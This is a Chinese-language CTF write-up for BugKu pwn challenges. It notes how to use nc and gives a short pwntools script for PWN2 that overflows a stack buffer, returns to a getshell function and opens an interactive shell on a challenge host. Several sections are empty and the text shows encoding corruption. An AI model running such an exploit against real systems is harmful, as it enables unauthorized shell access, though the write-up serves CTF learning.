[BUGKU][CTF][PWN][2020] PWN writeup
準(zhǔn)備UBUNTU pwndbg pwntools
PWN1
關(guān)鍵字:nc
知識(shí)點(diǎn):nc使用方法
https://www.cnblogs.com/nmap/p/6148306.html
nc命令是一個(gè)功能打包的網(wǎng)絡(luò)實(shí)用程序,它通過(guò)命令行在網(wǎng)絡(luò)上讀取和寫(xiě)入數(shù)據(jù);nc是為NMAP項(xiàng)目編寫(xiě)的,是目前已分裂的netcat家族的頂峰,它被設(shè)計(jì)成一個(gè)可靠的后端工具,可以立即為其他用戶(hù)提供網(wǎng)絡(luò)連接應(yīng)用程序和用戶(hù)。nc不僅可以使用IPv4和IPv6,而且可以為用戶(hù)提供無(wú)限的潛在用途。
在nc的大量功能中,有能力將nc鏈接在一起;TCP、UDP和到其他站點(diǎn)的SCTP端口;支持SSL;通過(guò)socks4或HTTP代理(帶有可選代理)進(jìn)行代理連接身份驗(yàn)證);一些一般原則適用于大多數(shù)應(yīng)用程序,因此使您能夠立即向通常不支持它的軟件添加網(wǎng)絡(luò)支持。
步驟:
PWN 2
關(guān)鍵字:緩沖區(qū)一溢出
知識(shí)點(diǎn):
步驟:準(zhǔn)備UBUNTU 安裝pwndbg +pwntools
1.敏感名稱(chēng)函數(shù) getshell
查看main
2.checksec pwn2
3.gdb來(lái)進(jìn)行調(diào)試,首先我們制造垃圾字符,接著運(yùn)行這個(gè)程序,把垃圾字符復(fù)制粘貼上
4.寫(xiě)腳本 運(yùn)行腳本 要用python2 python3報(bào)錯(cuò)TypeError: must be str, not bytes
from pwn import *p = remote("114.67.246.176", 15319) payload='a'*48+'a'*8+p64(0x400751) p.recvline() p.sendline(payload) p.interactive()PWN 3
關(guān)鍵字:nc
步驟:
PWN
關(guān)鍵字:
知識(shí)點(diǎn):
步驟:
總結(jié)
以上是生活随笔為你收集整理的[BUGKU][CTF][PWN][2020] PWN writeup的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 微软Edge扩展工具箱旨在将Chrome
- 下一篇: npm 下载为什么很慢?解决方案来了